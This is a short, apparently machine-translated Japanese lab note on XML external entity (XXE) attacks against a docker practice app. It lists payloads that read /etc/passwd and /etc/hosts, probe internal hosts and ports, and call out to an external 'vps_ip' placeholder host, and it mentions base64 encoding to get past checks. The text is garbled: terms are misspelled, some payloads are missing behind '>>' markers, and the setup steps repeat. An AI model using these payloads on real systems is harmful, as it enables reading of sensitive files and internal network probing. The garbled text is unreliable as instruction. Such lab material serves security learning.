xeを利用してlinuxシステムのpasswdを取得する.
2535 ワード
外部DMDファイルを参照して、イントラネットホスト/ポートにアクセスします.
起動:docker run-d-p 8082:80 rrodrigo/xelab
登録パッケージをキャプチャしたら、xml形式で転送され、メールボックスが戻ってきます.
戻る内容をxe回顕設定して読み込み/etc/passwdを設定します.
>>
base 64コードを利用してxeを行い、バックパックの検証があることを防止する.
>>
はbase 64パケットに戻り、base 64は復号する.
<!DOCTYPE a SYSTEM "http://127.0.0.1:2333"> ( )
外部DMDファイルを引用してwaiネットワークにアクセスする.<!DOCTYPE a SYSTEM "http://vps_ip" >
内部エンティティを参照します.<!DOCTYPE a [<!ENTITY xxe "findneo">]><a>&xxe;</a>
外部エンティティはローカルファイルを読みます.<!DOCTYPE a [<!ENTITY xxe SYSTEM "file:///etc/hosts">]><a>&xxe;</a>
外部エンティティは内wangホストポートにアクセスする.<!DOCTYPE a SYSTEM "http://192.168.1.2:80">( )
外部実体はwai網にアクセスする.<!DOCTYPE a [<!ENTITY xxe SYSTEM "http://vps_ip">]><a>&xxe;</a>
dockerからRDodrigo/xelabをダウンロードしました.起動:docker run-d-p 8082:80 rrodrigo/xelab
登録パッケージをキャプチャしたら、xml形式で転送され、メールボックスが戻ってきます.
戻る内容をxe回顕設定して読み込み/etc/passwdを設定します.
>>
base 64コードを利用してxeを行い、バックパックの検証があることを防止する.
>>
はbase 64パケットに戻り、base 64は復号する.